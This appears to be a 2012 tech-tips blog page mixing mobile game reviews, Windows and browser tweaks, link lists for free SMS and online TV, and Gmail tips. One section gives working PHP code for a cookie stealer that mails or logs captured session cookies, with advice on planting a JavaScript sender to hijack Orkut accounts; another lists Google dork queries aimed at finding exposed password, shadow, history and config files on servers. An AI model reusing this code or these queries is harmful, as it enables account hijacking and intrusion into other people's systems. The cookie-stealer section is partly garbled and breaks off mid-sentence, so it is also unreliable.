Tuesday 31 July 2012

Platinum Solitaire FOR S60V5

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The Bottom Line

Offering six different games, the highly            polished Platinum Solitairegives lots of bang            for the buck. It will be a while before a better mobile solitaire game hits the market.

Pros

  • Nice visuals and sound
  • Smooth learning curve
  • Easy to pick up and play

Cons

  • Some games, particularly Golf, are based on luck, not skill
  • Later card games get difficult

Description

  • Play six versions of solitaire
  • Wager based on how many cards you can return to the pile
  • Winning unlocks up to six different casinos
  • An optional tutorial shows you the ropes

Guide Review - Game Review: 'Platinum Solitaire'

Solitaire is one of those mobile gaming standbys likeSnake or Tetris , which makes Gameloft’s update attempt risky. Luckily, Platinum Solitaire manages to be both classic and refreshing. It features six different solitaires: original, golf, pyramid, free cell, Yukon and spider. Each variant is interesting enough to have its own version, and the graphics and sound are top notch for a card game. The wager system, and the ability to unlock more casinos, adds to the flavor. Novice card players may be turned off by the high difficulty level in the later games – a successful game of spider can take more than a half-hour of deep concentration – but you can still progress by sticking with even one of the variants. All in all, an excellent road trip game.
Publisher: Gameloft
Genre: Card
Release Date: July 2008
Reviewed On: iPhone/iPod Touch
Available For: Blackberry – Windows Mobile
Rating: 5 out of 5 stars

Wimbledon 2009

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  Gameloft Wimbledon 2009 Mobile Game



Experience the thrill of the most popular tennis tournament in the world with the official mobile game of Wimbledon. Start your tennis training with Junior Wimbledon in the hope of serving your way up the ranks to compete in the real Wimbledon Championships. As you play on Centre Court, striving to win The Challenge Cup or Challenge Trophy, you’ll experience the intensity of matches only the grass court can provide. No matter if you choose to play in the women’s or men’s tournament, this is one tennis match you’ll definitely want to download to your mobile phone

PuzzleGeddon

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                   PuzzleGeddon




As countless Hollywood sci-fi movies have proven over the years, the accepted way of invading a hostile planet usually involves high-tech weaponry, an armada of spaceships and a few thousand ruthless robotic soldiers to mop up the remnants of the opposing populace.

Puzzlegeddon adopts a slightly different approach. As in genre stablemate Puzzle Questyou subdue your opponent by linking together similarly-coloured blocks. Hardly the most fearsome method of obliteration we’ve come across, but it seems to work just as well.

The field of war is a 6x6 grid filled with blocks of four different shades: red, green, blue and yellow. Linking together five or more of these blocks and then pressing the fire button twice in quick succession removes them from the playing area and adds them to your resource reserves.

The caveat is that you’re not able to move individual blocks. Instead, you have to shift entire rows, both vertically and horizontally. This makes the game somewhat akin to a two dimensional version of a Rubik’s Cube, with each movement requiring careful consideration, lest you move one row and accidentally mess up your carefully arranged link-ups.

Combat in Puzzlegeddon is reliant on you accruing as many of the four coloured resources as possible. Each colour relates to a different ability - for example, red blocks boost your attacking resource which, when it's at a certain level, allows you to launch deadly missiles against your enemy.

Green, on the other hand, grants defensive options. Should you find yourself under attack by a rocket, you can launch a counter attack which will knock the hostile bird out of action before it can do any harm.

Yellow is all about disrupting your enemy’s plans. Using this ability you can briefly jam their early warning systems and prevent them from seeing your missiles until it’s too late to launch a counter strike, or - even better - prevent them from launching any missiles at all for a short period of time.

Finally, there's the blue power, which is all about boosting your existing abilities - improved missile attacks and better defensive capabilities are just two such options.

You don’t get all of these choices from the outset, however. During the Campaign mode, you’ll find that they become available as you progress, as do other playable characters and additional game modes, such as objective-led challenge levels and special one-on-one duels with CPU rivals.

It’s difficult to find fault with Puzzlegeddon. The concept is solid, the execution is perfect and the depth is considerable. If we were to pick up on one glaring deficiency it would be the absence of a multiplayer mode.

The game originated on PC and naturally came pre-packed with such a feature. It’s a crying shame that it’s been removed for this mobile release because it’s obvious that the game has been constructed with competitive play in mind.

Still, Puzzlegeddon is arguably more at home on a portable device than it was on the PC. The engaging gameplay and plethora of different game modes make this the kind of mobile entertainment you’d gladly wage interstellar war to partake in.

FREE NOKIA SYMBAIN World Snooker Championship 2009 3D

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Big break, a bit broken

Product: World Snooker Championship 09 | Publisher: I-play | Format: Mobile |Genre: Sports | Players: | File size: 623KB | Reviewed on: N95 8GB other handsets | Version: Europe


In any sport, the question of just when you're too old to compete is one that shadows any professional's career. When the simplest of tasks become an ordeal and even making your way around whatever arena you're playing in is a juddering mess, the chances are, you've been playing too long.

By that reckoning, if World Snooker Championship 09 was a real snooker player, it'd be a talented veteran who often turns up for competitions drunk, his formerly prodigious potting technique only manifesting itself sporadically.

This is very much a series that appears to have taken a backwards step, botching up areas it previously had nailed and failing to captialise on the promising features it had in World Snooker Championship 2008 (3D).

While it comes with everything you might expect from a licensed title – real players and a focus on competing in championships – the actual engine behind the game stuttered and spluttered all over the place on the N95 8GB we reviewed the game on (we also got far from stellar results with an N81 build), playing like it was in slow motion in places and even crashing when things got heated.

The matches themselves are, on the surface, fairly routine affairs. In career mode, moving forward from round to round is a question of winning the most frames – initially the best of three. WSC 09's shot guide can be switched on or off (giving a neat, if short, preview of both where the cue ball and coloured ball should end up), as can the fairly unnecessary and almost uniform 3D player models that only appear to take the actual shot.

Aiming is handled with the '4' and '6' keys, while the power of the shot is assigned to '2' and '8', the former increasing the force used on the cue ball as highlighted by a handy gauge. Tapping '*' lets you choose a specific point on the cue ball to target, and you can also pan around the entire table with the '3' key, making sure you can check out every option available rather than being rooted to the spot. As far as replicating the actions available in a snooker match, WSC 09 doesn't put a foot wrong.

It's the actual taking of the shot itself that most debilitates I-play's third crack at championship snooker. Everything seems to happen a second or so after tapping the keys, the 3D engine whirring into action at the very opposite of what you might term O'Sullivan pace, panning around the table with a jerkier motion than a learner driver after one too many Red Bulls.

General twitching, while annoying, could normally be tolerated, but it's these very convulsions that make aiming your shots so difficult, the irregular nature of casting the camera around the table meaning you can spend many a minute fiddling with the view, only for WSC 09 to pan right past your intended angle with the slightest touch.

In the end, while this rarely affects simple pockets, it can hit the 50-50s, turning a match against you because you miss a risky shot that ultimately should have been put away.

Naturally, your competition – Murphy, Ebdon, O'Sullivan and co – isn't inclined to let you get away with such mistakes, usually capitalising on your errors and clearing the board to rack up their own points.

It's odd, because none of these problems were evident in the previous edition. Ultimately, while this is a fairly comprehensive snooker sim, with a decent upgrade system (tracking your play and upping your skill-set after an impressive shot) and Challenges mode (essentially consisting of a series of trick shots), World Snooker Championship 2009's felt is just a little too lumpy to do the sport it tries so hard to replicate justice

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Saturday 21 July 2012

Bypass Megaupload country slot limit without toolbar, extension

Internet users who live in a country outside the United States would usually get limited country slot error when trying to download files from Mega upload. Mega upload requires the visitors to install the Alexa tool bar to proceed downloading and it will be quite troublesome if we’re using public computer or prefer not to install information gathering software like the Alexa Tool bar. There are several ways to solve this either by using US based proxy or by applying some tweaks to your computer/internet browser which is the most effective method this time. Those tweaks are:

Mozilla Firefox 2.0.0.5 tweak:

1. Go to address bar and type about:config . Press enter

2. Look for general.useragent.extra.firefox using the filter and double click on it

3. Change the default text with this: Firefox/2.0.0.5 MEGAUPLOAD 1.0

Windows Registry tweak (for Internet Explorer 7 and Internet Explorer 6):

1. Open run in the start menu and type regedit. Press enter.

2. in Registry Editor window, go to [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Setting\5.0\User Agent\Post Platform]

3. Right click on ‘Post Platform’ and add new string value. Enter “Alexa Toolbar”. Save the registry and restart your computer.

Note: For IE 7.0 the “Post Platform” will be located at:

[HKEY_LOCAL_MACHINE\SOFTWARE\Mcft\Windows\CurrentVersion\Internet Settings\User Agent\Post Platform]

I have Tested it and working. Just try this trick

Make Windows XP Shutdown Faster than ever

You can make your shut down process a bit faster by the following tweak.


Steps: (download the registry file)

1. This step is very important.
Export (right click > Export) the following keys and save it to a safer place.

HKEY CURRENT USER\Control Panel\Desktop
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control

2. Open Notepad, copy and paste the following to the Notepad.


Windows Registry Editor Version 5.00

[HKEY_CURRENT_USER\Control Panel\Desktop]
"AutoEndTasks"="1"
"HungAppTimeout"="1000"
"WaitToKillAppTimeout"="2000"

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control]
"WaitToKillServiceTimeout"="2000"

3. Save the file and close Notepad.

4. Change extension of the file from .txt (text file) to .reg (registry file).

5. Double click open this file and click Yes and the OK .

Hide files using Winrar and an JPG image

By using this trick, you can hide your files in a rar file, but it looks like a picture.

For this you need Winrar and a Picture to show instead the hidden file.


Steps:

1. Make a New Folder in any one drive, rename it to HIDDEN (you can put name of your wish).
Let it be in C drive, so that its address is C:\HIDDEN\

2. Copy all your secret files to that folder.
Select all the files.
Right click and select "Add to HIDDEN.rar" , here HIDDEN is the name that you gave to that folder created in first step.

3. Delete all files, except the created HIDDEN.rar file.

4. Copy an image to that folder. Let its name be taken as pic.jpg. This picture is used to hide the Winrar file that we made.

5. Now open Command Prompt. (Start > Run > cmd )

6. Change the prompt to C:\HIDDEN\ .
To do that, in cmd, first type cd c:\HIDDEN\ (works only if that folder is in windows (C:) drive).
If that folder is created in other drive like D:, then firts type D: ad press enter, then type cd D:\HIDDEN\.

7. Now type the following:
COPY /b pic.jpg + hidden.rar picture.jpg


8. That creates a picture that looks same as pic.jpg in HIDDEN folder.
This picture.jpg contains all your files.

To get your rar file, just change the extension .jpg of picture.jpg to .rar , and open it.
To hide, change the extension back to .jpg

List of free sms websites

These are the list of websites which offer sending free SMS

https://zyb.com/

http://www.mobyko.com/

http://stepsms.com/

http://www.smstxtbox.com/web/

http://www.junglesms.com/

http://50sms.com/

http://www.ecosms.ch/

http://www.free--sms.com/index.go

http://www.pimpmysms.com/

http://www.islamweb.net/

http://www.phones.com/

http://www.devinosms.com/

http://gsms.se/

http://www.themobiweb.com/en/sms.html

http://my.phonegnome.com/

http://sms4u.biz/signup.php

http://simsor.com/register

http://www.mobik.com/mobik/client/

http://www.smsdiscount.com/en/index.html

http://4usms.net/

http://www.sendsmsnow.com/

http://www.unisms.uni.cc/

http://www.atrochatro.com/

http://www.gsmvault.com/

http://smscity.com/

http://www.sms2india.org/

http://www.freesms.web.tr.tc/

http://www.d1g.com/

http://thesmszone.com/

http://zyb.com/

http://www.vazu.com/

http://www.sms.ac/

http://www.agentsms.com/

http://www.mobizone.com/

http://www.yellowpages.com.eg/

http://www.boswtol.com/

www.masrawy.com/sms

http://www.resalh.com/

http://free-sms-message.com/index.htm

http://adleel.com/sms.htm

http://mobile.fares.net/sms/uae

http://www.itsalat.com/

http://www.quios.com/

http://www.clickatell.com/

www.ulluminati.ch/Nexus/sms.html

http://www.freesms.net/

http://www.free-sms.com/

http://www.lycos.co.uk/

http://www.sms.at/

http://www.sms.com/

http://www.smsyes.com/

www.smsuae.com/sms-uae

http://www.edihasms.com/

http://www.shortmessage.com/

www.worldxs.net/sms.html

www.hot.it/sms

http://www.smspress.com/

http://www.freesms.com/

http://www.textmefree.com/

http://www.rosms.home.ro/

http://www.nice-prizes.de/

http://www.uni.de/

http://www.quicksms.de/

http://www.cbfsms.com/

http://www.sms.de/

www.send.sms.to/free.asp

http://www.genie.co.uk/

www.world-free.com/free-sms

www.aircall.ch/sms/sendmsg_main_free.asp

www.telefonmarkt.de/sms/sms_info.php

http://www.free-sms-service.de/

http://www.freesms.2way.de/

www.bestspider.com/sms

http://www.metacrawler.de/

www.jokes.gr/en/sms

www.call-magazine.de/free_sms

http://www.vizzavi.it/

www.uboot.com/uk

www.ournet.md/sms

http://www.cellular.co.za/download_...ms_software.htm

http://www.freesms.co.za/

http://www.hotsms.com/

http://www.jfax.de/

http://www.smsfree.co.uk/

www.mobileedge.co.uk/freesms/freesms.htm

http://www.sms-sprueche.tv/

http://www.sms.mums.it/

http://www.smspup.com/

www.jump.to/freesms

http://www.awalsms.com/

http://www.uaesms.com/

www.jinny.com.lb/sms

www.cellular.co.za/send_sms2.htm

http://www.mobizone.com/

http://www.smspop.com/

http://www.nemra1.com/

http://www.boswtol.com/

http://free-sms-message.com/index.htm

http://adleel.com/sms.htm

http://www.itsalat.com/

http://www.quios.com/

http://www.clickatell.com/

www.ulluminati.ch/Nexus/sms.html

http://www.freesms.net/

http://www.free-sms.com/

http://www.lycos.co.uk/

http://www.sms.at/

http://www.smsyes.com/

www.smsuae.com/sms-uae

http://www.edihasms.com/

www.worldxs.net/sms.html

www.hot.it/sms

http://www.smspress.com/

http://www.freesms.com/

http://www.textmefree.com/

http://www.rosms.home.ro/

http://www.nice-prizes.de/

http://www.uni.de/

http://www.quicksms.de/

http://www.cbfsms.com/

http://www.sms.de/

www.send.sms.to/free.asp

http://www.genie.co.uk/

www.world-free.com/free-sms

www.aircall.ch/sms/sendmsg_main_free.asp

www.telefonmarkt.de/sms/sms_info.php

www.bestspider.com/sms

www.jokes.gr/en/sms

www.call-magazine.de/free_sms

http://www.vizzavi.it/

www.uboot.com/uk

www.ournet.md/sms

http://www.cellular.co.za/download_f...s_software.htm

http://www.freesms.co.za/

http://www.hotsms.com/

http://www.jfax.de/

http://www.smsfree.co.uk/

www.mobileedge.co.uk/freesms/freesms.htm

http://www.sms-sprueche.tv/

http://www.sms.mums.it/

http://www.smspup.com/

www.jump.to/freesms

http://www.awalsms.com/

www.jinny.com.lb/sms

www.cellular.co.za/send_sms2.htm

How to make cookies and hack Orkut accounts

How to Make a Cookie Stealer

Introduction

Exactly how does a cookie stealer work, anyway? There are two components in a cookie stealer: the sender and the receiver.

The sender can take many forms. In essense, it's just a link to the receiver with the cookie somehow attached. It can sometimes be difficult to find a way to implement the sender.

The receiver, as the name suggests, is a device which receives the cookie from the sender. It can also take several forms, but the most common is that of a PHP document, most commonly found residing on some obscure webserver.


Step One: The Code

Coding a receiver is the part with which most newbies struggle. Only two things are needed to make a receiver: a webhost which supports PHP, and Notepad (see the end of the text for a link to some free PHP hosts).

As I said in the introduction, the receiver's job is to receive the cookie from the sender. The easiest way to send information to a PHP document is by using the HTTP GET method, which appends information to the end of the URL as a parameter (for example, "page.php?arg1=value"). PHP can access GET information by accessing $HTTP_GET_VARS[x], where x is a string containing the name of the argument.

Once the receiver has the cookie, it needs a way to get that cookie to you. The two most common ways of doing this are sending it in an email, and storing it in a log. We'll look at both.


First, let's look at sending it in an email. Here is what such a beast would look like (functioning code):

$cookie = $HTTP_GET_VARS["cookie"]; // line 2
mail("me@mydomain.com", "Cookie stealer report", $cookie); // line 3
?> // line 4


Line 1 tells the server that this is indeed a PHP document.
Line 2 takes the cookie from the URL ("stealer.php?cookie=x") and stores it in the variable $cookie.
Line 3 accesses PHP's mail() function and sends the cookie to "me@mydomain.com" with the subject of "Cookie stealer report".
Line 4 tells the server that the PHP code ends here.


Next, we'll look at my preferred method, which is storing the cookie in a logfile. (functioning code)

$cookie = $HTTP_GET_VARS["cookie"]; // line 2
$file = fopen('cookielog.txt', 'a'); // line 3
fwrite($file, $cookie . "\n\n"); // line 4
?> // line 5


Lines 1 and 2 are the same as before.
Line 3 opens the file "cookielog.txt" for writing, then stores the file's handle in $file.
Line 4 writes the cookie to the file which has its handle in $file. The period between $cookie and "\n\n" combines the two strings as one. The "\n\n" acts as a double line-break, making it easier for us to sift through the log file.
Line 5 is the same as before.


Step Two: Implementing the Stealer

The hardest part (usually) of making a cookie stealer is finding a way to use the sender. The simplest method requires use of HTML and JavaScript, so you have to be sure that your environment supports those two. Here is an example of a sender.

// Line 3


Line 1 tells the browser that the following chunk of code is to be interpereted as JavaScript.
Line 2 adds document.cookie to the end of the URL, which is then stored in document.location. Whenever document.location is changed, the browser is redirected to that URL.
Line 3 tells the browser to stop reading the code as JavaScript (return to HTML).


There are two main ways of implementing the sender:

You can plant your sender where the victim will view it as an HTML document with his browser. In order to do that, you have to find some way to actually post the code somewhere on the site

Multiple Logins of Gmail and Orkut through firefox

Just follow the following steps and you will be able to login in gmail and orkut with multiple accounts. Through this you will be able to make profiles in your firefox.

Step 1:
Open system properties(by right clicking my computer), choose tab advanced, click to environment variables button. in system variables section, click new. type this information to each textbox.

Step 2:
variable name: moz_no_remote (should be all small letter).

variable value: 1

Step 3:
open firefox icon's properties(from desktop and quick launch). add extension -p to command line(like "c:\program files\mozilla firefox\firefox.exe" -p). press ok.
When you will open firefox it will prompt for profile selection create a profile,open firefox login to orkut open once more use another profile login.

Watch television Online for free


Television first came to India [named as ‘Doordarshan’ (DD) on Sept 15, 1959 as the National Television Network of India. The first telecast started on Sept 15, 1959 in New Delhi. After a gap of about 13 years, s second television station was established in Mumbai (Maharashtra) in 1972 and by 1975 there were five more television stations at Srinagar (Kashmir), Amritsar (Punjab), Calcutta (West Bengal), Madras (Tamil Nadu) and Lucknow (Uttar Pradesh). For many years the transmission was mainly in black & white.
In 1992, the government liberated its markets, opening them up to cable television. Five new channels belonging to the Hong Kong based STAR TV gave Indians a fresh breath of life. MTV, STAR Plus, BBC, Prime Sports and STAR Chinese Channel were the 5 channels. Zee TV was the first private owned Indian channel to broadcast over cable. A few years later CNN, Discovery Channel, National Geographic Channel made its foray into India. Star expanded its bouquet introducing STAR World, STAR Sports, ESPN and STAR Gold.

And now India has about couple hundred channels. But I think the mostly viewed channels are Zee, Sony, Star channels.
Most of those who live in India don't care whether they can watch the Indian Television channels online or not but for those who live outside India really strives to watch these Indian channels. I have seen lot of people searching for "free indian channels online" or how to watch indian channels online or if I want to watch zee cinema online or zee tv online or Tamil TV watch online where to go?

So here I am trying to compile the list of sites where you can watch these channels online.


  • www.live-from-bd.com : The site called "Live from Bangladesh". The site has list of all the famous Indian channels that you can watch online. Zee TV, Sony TV, Star One, Star Plus, Zee Cinema etc. The site doesn't require you to register. All you need is Windows Media Player 10, Real Player, VLC Media Player installed on your machine. You must be aware of Windows Media Player and Real Player. You can get VLC media player free, just google it and you will find it. Once you go to the website, you will see list of channels on the left. Click on the channel you want to see and you would see the screen with username and password information. The popup box will ask you to enter that information and you should be all set. Watch Zee Cinema Online, Watch Zee TV online, Watch Sony TV Online and enjoy.
  • www.idesitv.com: This site used to require registration but they have changed their layout and now its just simple page with list of channels URLs. Click on the channel and a popup window will open up. Same list of channels are available here. Less than what you get from the previous site. Few sites have voice issue. The voice and video moves in fast forward motion makes it sound funny. For e.g. Sony TV & Star One.
  • www.djzaki.com: I don't believe this site has online channels but you can watch videos clippings from these Indian Channels. This site requires registration.
  • www.nepalisite.com/tv : This site has only 5-6 channels but the quality is good and doesn't have annoying ads. It has Zee, Sony, Sony Max, Star Plus, Aaj Tak, IBN Live, Star One. I would rank this site as 2nd after live-from-bd.com. Watch Star Plus Online.
  • www.onlinemedia.in: Beware of this website. It does provide all these channels but has lot of popup ads and could have spywares. I would go to this site as a last option.
  • www.musicnmovies.com: Music 'n Movies is based on free media Meta-crawler, which searches on the media file hosting servers for free bollywood movies , indexes them and present them in well format on this portal.
  • viewmy.tv :Check out a free new live internet tv service called http://viewmy.tv - an excellent website that allows you to watch internet TV from all over the world, they even let you create your own personal page and have tons of features, like search, countries, genres, multi-lingual descriptions, channel bitrate quality monitoring, rss feeds for blogs, full screen, mini screen options !! everyone's watching viewmy.tv.
  • www.tvcells.org :Its another site to watch tv online
  • World Wide Internet Television: Also known as, wwitv.com is a nice site with over 1000 listings of TV channels that you can use to watch TV online for free. While I haven't counted the languages or countries represented there seem to be quite a few ! This is a site I visit often when I want to watch something in Spanish, followed by something in Hindi. The site requires Real Player and is very easy to use and navigate.
  • www.streambox.tv :StreamBox is a web-streaming portal that live-streams Indian TV channels through the internet. Just like how TV channels are telecasted through cable or dish, StreamBox telecasts Indian TV channels through the internet.
  • indianchannels.blogspot.com:Its a blog which offers you many indian channels.
  • SOME MORE SITES
  1. http://www.infomaza.com/
  2. http://www.moviesfromindia.com/
  3. http://www.musicspice.com/
  4. http://asian-sensations.com/
  5. http://www.shareview.us/
  6. http://www.vzvideo.com/
  7. http://www.firstdesitv.com/
  8. http://www.bollydhoom.com/
  9. http://www.lordoftv.com
  10. http://www.jumptv.com/en
  11. http://www.revision3.com/indigital...
  12. http://revision3.com/diggnation...
  13. http://duggmirror.com/tech_news/techtv_r...
  14. http://www.freebe.tv
  15. http://www.wwitv.com
  16. http://www.channelchooser.com
  17. http://www.getdemocracy.com
  18. http://www.telegossip.org
  19. http://www.my-tv.it/video.jsp?idart=1875...
  20. http://www.nagoya-bunri.ac.jp/~inayoshi/...
  21. http://wwitv.com/portal.htm
  22. http://gbstv.info
  23. http://www.tv.com
  24. http://www.jumptv.com
  25. http://www.beelinetv.com
  26. http://www.streamick.com/ watch online
  27. http://www.viidoo.com/en/index.php...
  28. http://www.channelchooser.com
  29. http://www.viidoo.com/en/index.php...
  30. http://www.wavelit.com/index.asp...
  31. http://www.tetesaclaques.tv/video.php?vi...
  32. http://www.twit.tv
  33. http://www.ctv.ca/generic/generated/bpla...
  34. http://dl.tv
  35. http://www.comingsoon.net/
  36. http://www.mediahopper.com

Google search tips for hacking

Google search engine can be used to hack into remote servers or gather confidential or sensitive information which are not visible through common searches.

Google is the world’s most popular and powerful search engine. It has the ability to accept pre-defined commands as inputs which then produces unbelievable results.

Google’s Advanced Search Query Syntax

Discussed below are various Google’s special commands and I shall be explaining each command in brief and will show how it can be used for getting confidential data.

[ intitle: ]

The “intitle:” syntax helps Google restrict the search results to pages containing that word in the title.

intitle: login password


will return links to those pages that has the word "login" in their title, and the word "password" anywhere in the page.

Similarly, if one has to query for more than one word in the page title then in that case “allintitle:” can be used instead of “intitle” to get the list of pages containing all those words in its title.

intitle: login intitle: password


is same as

allintitle: login password


[ inurl: ]

The “inurl:” syntax restricts the search results to those URLs containing the search keyword. For example: “inurl: passwd” (without quotes) will return only links to those pages that have "passwd" in the URL.

Similarly, if one has to query for more than one word in an URL then in that case “allinurl:” can be used instead of “inurl” to get the list of URLs containing all those search keywords in it.

allinurl: etc/passwd


will look for the URLs containing “etc” and “passwd”. The slash (“/”) between the words will be ignored by Google.

[ site: ]

The “site:” syntax restricts Google to query for certain keywords in a particular site or domain.

exploits site:hackingspirits.com


will look for the keyword “exploits” in those pages present in all the links of the domain “hackingspirits.com”. There should not be any space between “site:” and the “domain name”.

[ filetype: ]

This “filetype:” syntax restricts Google search for files on internet with particular extensions (i.e. doc, pdf or ppt etc).

filetype:doc site:gov confidential


will look for files with “.doc” extension in all government domains with “.gov” extension and containing the word “confidential” either in the pages or in the “.doc” file. i.e. the result will contain the links to all confidential word document files on the government sites.


[ link: ]

“link:” syntax will list down webpages that have links to the specified webpage.

link:www.expertsforge.com


will list webpages that have links pointing to the SecurityFocus homepage. Note there can be no space between the "link:" and the web page url.


[ related: ]

The “related:” will list web pages that are "similar" to a specified
web page.

related:www.expertsforge.com


will list web pages that are similar to the Securityfocus homepage. Note there can be no space between the "related:" and the web page url.


[ cache: ]

The query “cache:” will show the version of the web page that Google
has in its cache.

cache:www.hackingspirits.com


will show Google's cache of the Google homepage. Note there can be no space between the "cache:" and the web page url.

If you include other words in the query, Google will highlight those words within the cached document.

cache:www.hackingspirits.com guest


will show the cached content with the word "guest" highlighted.

[ intext: ]

The “intext:” syntax searches for words in a particular website. It ignores links or URLs and page titles.

intext:exploits


will return only links to those web pages that has the search keyword "exploits" in its webpage.


[ phonebook: ]

“phonebook” searches for U.S. street address and phone number information.

phonebook:Lisa+CA


will list down all names of person having “Lisa” in their names and located in “California (CA)”. This can be used as a great tool for hackers incase someone want to do dig personal information for social engineering.

Google Hacks

Well, the Google’s query syntaxes discussed above can really help people to precise their search and get what they are exactly looking for.

Now Google being so intelligent search engine, hackers don’t mind exploiting its ability to dig much confidential and secret information from the net which they are not supposed to know. Now I shall discuss those techniques in details how hackers dig information from the net using Google and how that information can be used to break into remote servers.

Index Of

Using “Index of ” syntax to find sites enabled with Index browsing

A webserver with Index browsing enabled means anyone can browse the webserver directories like ordinary local directories. The use of “index of” syntax to get a list links to webserver which has got directory browsing enabled will be discussd below. This becomes an easy source for information gathering for a hacker. Imagine if the get hold of password files or others sensitive files which are not normally visible to the internet. Below given are few examples using which one can get access to many sensitive information much easily.

Index of /admin
Index of /passwd
Index of /password
Index of /mail

"Index of /" +passwd
"Index of /" +password.txt
"Index of /" +.htaccess

"Index of /secret"
"Index of /confidential"
"Index of /root"
"Index of /cgi-bin"
"Index of /credit-card"
"Index of /logs"
"Index of /config"


Looking for vulnerable sites or servers using “inurl:” or “allinurl:”

a. Using “allinurl:winnt/system32/” (without quotes) will list down all the links to the server which gives access to restricted directories like “system32” through web. If you are lucky enough then you might get access to the cmd.exe in the “system32” directory. Once you have the access to “cmd.exe” and is able to execute it.


b. Using “allinurl:wwwboard/passwd.txt”(without quotes) in the Google search will list down all the links to the server which are vulnerable to “WWWBoard Password vulnerability”. To know more about this vulnerability you can have a look at the following link:

http://www.securiteam.com/exploits/2BUQ4S0SAW.html

c. Using “inurl:.bash_history” (without quotes) will list down all the links to the server which gives access to “.bash_history” file through web. This is a command history file. This file includes the list of command executed by the administrator, and sometimes includes sensitive information such as password typed in by the administrator. If this file is compromised and if contains the encrypted unix (or *nix) password then it can be easily cracked using “John The Ripper”.

d. Using “inurl:config.txt” (without quotes) will list down all the links to the servers which gives access to “config.txt” file through web. This file contains sensitive information, including the hash value of the administrative password and database authentication credentials.

For Example: Ingenium Learning Management System is a Web-based application for Windows based systems developed by Click2learn, Inc. Ingenium Learning Management System versions 5.1 and 6.1 stores sensitive information insecurely in the config.txt file. For more information refer the following
links: http://www.securiteam.com/securitynews/6M00H2K5PG.html

Other similar search using “inurl:” or “allinurl:” combined with other syntax


inurl:admin filetype:txt
inurl:admin filetype:db
inurl:admin filetype:cfg
inurl:mysql filetype:cfg
inurl:passwd filetype:txt
inurl:iisadmin
inurl:auth_user_file.txt
inurl:orders.txt
inurl:"wwwroot/*."
inurl:adpassword.txt
inurl:webeditor.php
inurl:file_upload.php

inurl:gov filetype:xls "restricted"
index of ftp +.mdb allinurl:/cgi-bin/ +mailto


Looking for vulnerable sites or servers using “intitle:” or “allintitle:”

a. Using [allintitle: "index of /root”] (without brackets) will list down the links to the web server which gives access to restricted directories like “root” through web. This directory sometimes contains sensitive information which can be easily retrieved through simple web requests.

b. Using [allintitle: "index of /admin”] (without brackets) will list down the links to the websites which has got index browsing enabled for restricted directories like “admin” through web. Most of the web application sometimes uses names like “admin” to store admin credentials in it. This directory sometimes contains sensitive information which can be easily retrieved through simple web requests.

Other similar search using “intitle:” or “allintitle:” combined with other syntax

intitle:"Index of" .sh_history
intitle:"Index of" .bash_history
intitle:"index of" passwd
intitle:"index of" people.lst
intitle:"index of" pwd.db
intitle:"index of" etc/shadow
intitle:"index of" spwd
intitle:"index of" master.passwd
intitle:"index of" htpasswd
intitle:"index of" members OR accounts
intitle:"index of" user_carts OR user_cart

allintitle: sensitive filetype:doc
allintitle: restricted filetype :mail
allintitle: restricted filetype:doc site:gov


Other interesting Search Queries

· To search for sites vulnerable to Cross-Sites Scripting (XSS) attacks:

allinurl:/scripts/cart32.exe
allinurl:/CuteNews/show_archives.php
allinurl:/phpinfo.php

To search for sites vulnerable to SQL Injection attacks:

allinurl:/privmsg.php
allinurl:/privmsg.php

Gmail Hacks, Tips & Tricks

You already know that Gmail beats all other email providers with its endless customization capabilities, Google product integration and fantastic spam filter. Take it to the next level with these Gmail power user tips and Greasemonkey extensions for Firefox. We haven’t forgotten the Mac users, either. For more great resources, check out the official Gmail blog and the Gmail Power Users group on Google Groups. If you'd like to learn more about other email programs, check out the email category at the web directory.
1. Master the Gmail keyboard shortcuts
If you haven’t already, master the shortcut keys. Compose, mark as read, archive and much more with the press of a button. Sure, you know c for compose and ! for report spam, but do you know g + t for the sent mail folder? You can find a complete list at the official Gmail shortcut page.
2. Google Code Macros
The Greasemonkey extension for Firefox, familiar to many power users, allows JavaScript functionality on any web page. Piggybacking off of this capability, the generically-named Macros script enables a number of keyboard shortcuts. Google apparently integrated some of Macros shortcuts when revamping Gmail, but there are still functions that the Macros programmers believe Gmail needs. “I firmly believe this is *the* essential Gmail trick to end all Gmail tricks,” writes David Chartier at DownloadSquad.


3. Create bookmarklets for frequent searches
This form created by Steve Rubel generates a bookmarklet for searches in Gmail. (By the way, a bookmarklet is a baby bookmark that acts a single click tool for a webpage or browser—thanks, Wikipedia). Take Rubel’s form further by dragging the bookmarklets to your bookmarks bar.
4. Resize your compose box
The aptly-named Resizeable Textarea Firefox extension allows you to click and drag the edge of your compose box without resizing your browser window. Note that any browser built with the newest Opensource.org webkit—Safari, for example—will already have this capability. For more browser info, check out the internet software category.


5. View unread messages first
Search on the string “label:unread label:inbox” to force all of your unread messages to the top of the list, writes Matt Cutts. (Note: you don’t have to create any labels for this to work.) Try bookmarking Cutts’s search and dragging it to your bookmarks bar to view all unread messages first.
6. Streamline adding attachments
Wouldn’t it be great if you could drop attachments directly into the attachment box? Check out the Firefox extension Dragdropupload if you are running Firefox 2.0 (as of this writing, it hadn’t been updated for 2.0.0.12).


7. Quickly switch between Google accounts
If you have multiple Google accounts—a Gmail with Google Apps account and a regular Gmail account, for example—streamline them with this script for Firefox with Greasemonkey. The script adds a “change user” drop-down bar in place of the “sign out” link.



You can also try
Gmail Manager (also a Firefox extension), which adds a Gmail menu bar to the Firefox window. Juggle multiple accounts, sign in and out.


8. Bookmark a single email
As of November 2007, all Gmail messages have dedicated URLs (according to the official Gmail blog). Rather than killing a tree by printing the message or laboriously copying down the info, you can CTRL-D (or ?-D) an important email and refer to it at your leisure.

9. Automate frequently repeated text

Signature functionality is built into Gmail, but frequently typed phrases can be automated with Firefox extension Signature, which allows you to insert designated text with a keystroke. (As of this writing, Signature is not yet compliant with Firefox 2.0.0.12.) Also try a Windows app called AutoHotKey or Mac app TypeIt4Me. Both apps allow you to create keystrokes to automate text in virtually any application.



10. POP3 & IMAP forwarding

“I recommend using IMAP (where the mail is both on the server and on your local machine(s)/device(s)) and uploading all your email onto Gmail,” writes Mark Wheeler, a Gmail power user. “You can keep copies on the Google servers and your desktop/laptop/phone so that they are all efficiently accessible and available anytime anywhere. Don't have to worry about backups, or disk space...I have 25,000 emails and have only used 9% of my space!”

